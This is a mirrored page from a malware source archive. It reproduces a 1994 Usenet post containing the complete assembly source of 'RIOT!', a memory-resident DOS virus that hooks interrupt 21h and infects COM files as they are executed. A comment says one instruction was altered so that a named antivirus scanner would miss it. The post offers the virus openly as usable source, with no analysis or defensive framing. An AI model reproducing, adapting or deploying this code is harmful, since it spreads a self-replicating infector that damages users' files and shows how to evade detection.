mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
187 lines
6.5 KiB
NASM
187 lines
6.5 KiB
NASM
|
From netcom.com!ix.netcom.com!netnews Sat Nov 12 17:11:15 1994
|
||
|
Xref: netcom.com alt.comp.virus:200
|
||
|
Path: netcom.com!ix.netcom.com!netnews
|
||
|
From: Zeppelin@ix.netcom.com (Mr. G)
|
||
|
Newsgroups: alt.comp.virus
|
||
|
Subject: Re:Riot
|
||
|
Date: 12 Nov 1994 03:37:30 GMT
|
||
|
Organization: Netcom
|
||
|
Lines: 171
|
||
|
Distribution: world
|
||
|
Message-ID: <3a1d9q$ma6@ixnews1.ix.netcom.com>
|
||
|
References: <3a0s7b$r6i$1@mhadf.production.compuserve.com> <3a1aj7$l5e@ixnews1.ix.netcom.com> <3a1cri$m31@ixnews1.ix.netcom.com>
|
||
|
NNTP-Posting-Host: ix-ir4-21.ix.netcom.com
|
||
|
|
||
|
; RIOT! - Revolution In Our Time
|
||
|
|
||
|
model tiny
|
||
|
code
|
||
|
org 100h
|
||
|
start:
|
||
|
; push ax ; Original push "ax",
|
||
|
PUSH DX ; But push dx instead,
|
||
|
; and S&S FindViru can't
|
||
|
; find it as NINA-256 :)
|
||
|
|
||
|
mov ax,9753h ; installation check
|
||
|
int 21h
|
||
|
mov ax,ds
|
||
|
dec ax
|
||
|
mov ds,ax ; ds->program MCB
|
||
|
mov ax,ds:[3] ; get size word
|
||
|
push bx
|
||
|
push es
|
||
|
sub ax,40h ; reserve 40h paragraphs
|
||
|
mov bx,ax
|
||
|
mov ah,4Ah ; Shrink memory
|
||
|
allocation
|
||
|
int 21h
|
||
|
|
||
|
mov ah,48h ; Allocate 3Fh
|
||
|
paragraphs
|
||
|
mov bx,3Fh ; for the virus
|
||
|
int 21h
|
||
|
|
||
|
mov es,ax ; copy virus to high
|
||
|
xor di,di ; memory
|
||
|
mov si,offset start + 10h ; start at MCB:110h
|
||
|
mov cx,100h ; (same as PSP:100h)
|
||
|
rep movsb
|
||
|
sub ax,10h ; adjust offset as if it
|
||
|
push ax ; originated at 100h
|
||
|
mov ax,offset highentry
|
||
|
push ax
|
||
|
retf
|
||
|
|
||
|
highentry:
|
||
|
mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so
|
||
|
the
|
||
|
; memory isn't freed
|
||
|
when the
|
||
|
; program terminates
|
||
|
mov ax,3521h ; get int 21h vector
|
||
|
int 21h
|
||
|
|
||
|
mov word ptr cs:oldint21,bx ; save it
|
||
|
mov word ptr cs:oldint21+2,es
|
||
|
push es
|
||
|
pop ds
|
||
|
mov dx,bx
|
||
|
mov ax,2591h ; redirect int 91h to
|
||
|
int 21h
|
||
|
int 21h
|
||
|
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov dx,offset int21
|
||
|
mov al,21h ; set int 21h to virus
|
||
|
vector
|
||
|
int 21h
|
||
|
|
||
|
pop ds ; ds->original program
|
||
|
PSP
|
||
|
pop bx
|
||
|
push ds
|
||
|
pop es
|
||
|
|
||
|
ENDFILE dw 100h ; Size of infected COM
|
||
|
file
|
||
|
|
||
|
return_COM:
|
||
|
mov di,100h ; restore original
|
||
|
mov si,endfile ; file
|
||
|
add si,di ; adjust for COM
|
||
|
starting
|
||
|
mov cx,100h ; offset
|
||
|
rep movsb
|
||
|
pop ax
|
||
|
push ds ; jmp back to original
|
||
|
mov bp,100h ; file (PSP:100)
|
||
|
push bp
|
||
|
retf
|
||
|
exit_install:
|
||
|
pop ax ; pop CS:IP and flags in
|
||
|
pop ax ; order to balance the
|
||
|
pop ax ; stack and then exit
|
||
|
the
|
||
|
jmp short return_COM ; infected COM file
|
||
|
int21:
|
||
|
cmp ax,9753h ; installation check?
|
||
|
je exit_install
|
||
|
cmp ax,4B00h ; execute?
|
||
|
jne exitint21 ; nope, quit
|
||
|
push ax ; save registers
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push ds
|
||
|
call infect
|
||
|
pop ds ; restore registers
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
exitint21:
|
||
|
db 0eah ; jmp far ptr
|
||
|
oldint21 dd ?
|
||
|
|
||
|
infect:
|
||
|
mov ax,3D02h ; open file read/write
|
||
|
int 91h
|
||
|
jc exit_infect
|
||
|
mov bx,ax
|
||
|
mov cx,100h
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov ah,3Fh ; Read first 100h bytes
|
||
|
mov dx,offset endvirus
|
||
|
int 91h
|
||
|
mov ax,word ptr endvirus
|
||
|
cmp ax,'MZ' ; exit if EXE
|
||
|
je close_exit_infect
|
||
|
cmp ax,'ZM' ; exit if EXE
|
||
|
je close_exit_infect
|
||
|
cmp word ptr endvirus+2,9753h ; exit if already
|
||
|
je close_exit_infect ; infected
|
||
|
mov al,2 ; go to end of file
|
||
|
call move_file_pointer
|
||
|
cmp ax,0FEB0h ; exit if too large
|
||
|
ja close_exit_infect
|
||
|
cmp ax,1F4h ; or too small for
|
||
|
jb close_exit_infect ; infection
|
||
|
mov endfile,ax ; save file size
|
||
|
call write
|
||
|
mov al,0 ; go to start of file
|
||
|
call move_file_pointer
|
||
|
mov dx,100h ; write virus
|
||
|
call write
|
||
|
close_exit_infect:
|
||
|
mov ah,3Eh ; Close file
|
||
|
int 91h
|
||
|
exit_infect:
|
||
|
retn
|
||
|
|
||
|
move_file_pointer:
|
||
|
push dx
|
||
|
xor cx,cx
|
||
|
xor dx,dx
|
||
|
mov ah,42h
|
||
|
int 91h
|
||
|
pop dx
|
||
|
retn
|
||
|
|
||
|
write:
|
||
|
mov ah,40h
|
||
|
mov cx,100h
|
||
|
int 91h
|
||
|
retn
|
||
|
|
||
|
db ' RIOT!' ; Revolution In Our Time!
|
||
|
endvirus:
|
||
|
int 20h ; original COM file
|
||
|
end start
|
||
|
|
||
|
|
||
|
|
||
|
|